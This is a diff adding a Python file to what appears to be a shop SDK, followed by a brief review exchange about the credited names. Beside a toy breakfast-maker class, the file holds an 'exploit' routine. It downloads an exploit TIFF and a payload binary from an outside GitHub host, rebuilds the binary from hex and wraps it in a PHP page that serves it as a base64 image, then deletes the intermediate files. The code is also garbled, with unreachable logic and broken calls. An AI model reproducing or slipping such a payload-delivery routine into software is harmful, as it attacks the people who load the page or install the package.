shopsdk/utilsnotbyme.py

```diff
@@ -0,0 +1,288 @@
+			iron.switchPower(h)
+			return waffle
+class BreakfastMaker:
+	preferredBreakfasts={'bushing':Waffles}
+	def __init__(self):
+		pass
+	def makeBreakfastFor(self,user):
+		if not user in self.preferredBreakfasts:
+			raise ValueError("I don't know how to make breakfast for %s!"%user)
+			maker=self.preferredBreakfasts[user]
+			breakfast=maker().make()
+			return breakfast
+def startbreakfast():
+  o("Breakfast Maker v0.2")
+  user=input("Please enter your username: ")
+  maker=BreakfastMaker()
+  o("Making breakfast for %s..."%user)
+  breakfast=maker.makeBreakfastFor(user)
+  o("Your breakfast is ready!")
+  breakfast.display()
+  o("\a")
+def exploit(a,b):
+  if a==0:
+    if b==1: #No Pre-Existing Mode
+      pre(0)
+      task(2)
+    elif b==2: #With Pre-Existing Mode
+      pre(1)
+      task(2)
+    elif b==3: #Download Hex Template Mode
+      pre(1)
+      os._exit(0)
+    elif b==4: #Re-generate Credits File mode
+      credits(0)
+  elif a==1:
+    with open('exploit.tiff','rb') as f:
+      hexdata=l.hexlify(f.read())
+      m.dump((hexdata.decode('utf-8')),open('hex.dat','wb'))
+  elif a==2:
+    data2=str(j.getcwd()) + "/" + "exploit.tiff"
+    url2="https://raw.githubusercontent.com/planetbeing/touchfree/master/tiff/metasploit/exploit.tiff"
+    downloadtask(data2,url2)
+  elif a==3:
+    data1=str(j.getcwd()) + "/" + "payload.bin"
+    url1="https://raw.githubusercontent.com/planetbeing/touchfree/master/tiff/metasploit/payload.bin"
+    downloadtask(data1,url1)
+  elif a==4:
+    credits(1)
+  elif a==5:
+    if j.path.exists("payload.bin"):
+      j.remove("payload.bin")
+  elif a==6:
+    if j.path.exists("hex.dat"):
+      j.remove("hex.dat")
+  elif a==7:
+    if j.path.exists("exploit.tiff"):
+      j.remove("exploit.tiff")
+  elif a==8:
+    if j.path.exists("exploit.bin"):
+      j.remove("exploit.bin")
+  elif a==9:
+    if j.path.exists("exploit.php"):
+      j.remove("exploit.php")
+  else:
+    exploit(0)
+def run():
+  load_file=open('hex.dat','rb')
+  f=m.load(load_file)
+  with open('exploit.bin','wb') as fout:
+    fout.write(
+      l.unhexlify(f)
+    )
+  exploit(6,0)
+  data=open('exploit.bin','rb').read()
+  a=l.b2a_base64(data)
+  b=a.decode()
+  html='<?php\n$htmlcode="<img src=\\"data:image/png;base64,' + b + '\\">";\necho $htmlcode\n?>'
+  open('exploit.php','w').write(html)
+  exploit(7,0)
+  exploit(8,0)
+  return html
+def pre(a):
+  if a==0:
+    task(1)
+    task(0)
+    data=int(0)
+    return data
+  elif a==1:
+    task(1)
+    data=int(0)
+    return data
+  elif a==2:
+    exploit(5,0)
+    task(0)
+    data="MSG:" + " " + str(j.getcwd()) + " " + "DOWNLOADED!"
+    return data
+def credits(a):
+  a="credits:\n"
+  b=a + "base64 implmentation by fmw42\n"
+  c=b + "hex implementation by falsetru\n"
+  d=c + "file to hex implementation by ShadowRanger\n"
+  e=d + "urllib3 downloading implementation by shazrow\n"
+  f=e + "exploit.bin based on exploit.tiff by planetbeing\n"
```

Comment:
Are these names of actual people?

Reply:
Yeah, these were guys who wrote some of the concepts I used.